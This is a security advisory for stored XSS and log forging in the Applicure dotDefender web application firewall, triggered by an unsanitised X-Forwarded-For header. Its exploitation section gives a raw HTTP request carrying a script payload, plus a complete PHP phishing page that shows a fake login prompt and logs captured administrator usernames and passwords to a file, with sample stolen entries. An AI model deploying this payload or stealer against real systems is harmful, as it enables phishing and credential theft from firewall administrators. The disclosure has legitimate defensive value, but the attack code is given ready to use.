Applicure DotDefender WAF <=5.13-13282

Credit: AkaStep
Risk: Low
Local: No
Remote: Yes

Vulnerale soft: Applicure DotDefender WAF <=5.13-13282 Vulns: Persistent XSS,Log forging,Log poisoning/Potential DoS of admin interface via malicious scripts vulnerabilities. Vendor: Discovered by: AkaStep Tested on: Centos 6.6,Fedora 21 =========================================== [About Applicure DotDefender WAF] dotDefender is the market-leading software Web Application Firewall (WAF). dotDefender boasts enterprise-class security, advanced integration capabilities, easy maintenance and low total cost of ownership (TCO). dotDefender is the perfect choice for protecting your website and web applications today. (c) Applicure =========================================== [Vuln details] Under some circumstances this is possible attack DotDefender's admin interface and as result conduct PHISHING/Log forging/Potential Denial Of service against "Log Viewer" functionality. The main reason of vulnerability: DotDefenders Developers trusts to X-Forwarded-for HTTP Header and to it's variable (that is client side controllable) and sadly there is no any validation/sanitization of that variable and it's val. This vulnerability was successfully tested against for the following configurations:(in Lab/ Production environment) 1) Apache Traffic Server ===> Apache 2.4 2) Apache 2.4 with mod_proxy. Tested versions:(But other versions may also be affected) &#8226; dotDefender Version: 5.12-13217 &#8226; Web Server Type: Apache &#8226; Server Operating System: Linux &#8226; Web Server Version: Unknown ========================================== &#8226; dotDefender Version: 5.13-13282 &#8226; Web Server Type: Apache &#8226; Server Operating System: Linux &#8226; Web Server Version: Unknown ========================================== [Exploitaiton] Notice X-forwarded-for in request headers.This is a our payload. Note: this is attacker host.PHISH page landed there.It depends on attacker.In example by masquerading it you have big chances to own victim. Please note that: There is no USER AGENT specified in request. This condition triggers WAF's BLOCK and Log condition which we need it. There is a lot of ways to trigger WAF anyways, I prefer this way. URL: http://saytim.remote/index.php REQUEST HEADERS: METHOD: POST Host: saytim.remote Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-forwarded-for:<script>var harda=document.location;var yazbled=''+harda;;</script> DNT: 1 Cookie: PHPSESSID=71qfte21egelmog3lksaji6bk4 Connection: keep-alive If-Modified-Since: * Few printscreens: //index.php (stealer) <?php error_reporting(0); haragedirsenayusaq(); function haragedirsenayusaq() { if($_SERVER['PHP_AUTH_USER']!==mt_rand()) { header('WWW-Authenticate: Basic realm="DotDefender"'); header('HTTP/1.0 401 Unauthorized'); @file_put_contents('ownedyou.txt','uname' . (string)$_SERVER['PHP_AUTH_USER'] . ' psw: ' . (string)$_SERVER['PHP_AUTH_PW'] .' ref_url ' . htmlspecialchars((string)$_GET['ref_url']).PHP_EOL,FILE_APPEND); echo '<script>location.replace(document.location);</script>'; } else { @file_put_contents('ownedyou.txt','uname' . (string)$_SERVER['PHP_AUTH_USER'] . ' psw: ' . (string)$_SERVER['PHP_AUTH_PW'] .' ref_url ' . htmlspecialchars((string)$_GET['ref_url']).PHP_EOL,FILE_APPEND); //echo '<pre>'; //var_dump($_SERVER); echo '<script>location.replace(document.location);</script>'; } } ?> //stealed credentials: ownedyou.txt unamesalam psw: sagol ref_url http://localhost/DotDefender/ unameTHIS IS A FAKE LOGIN PAGE FAKE_PAGE psw: THIS IS A FAKE LOGIN PAGE ref_url http://localhost/DotDefender/ POC Vid:


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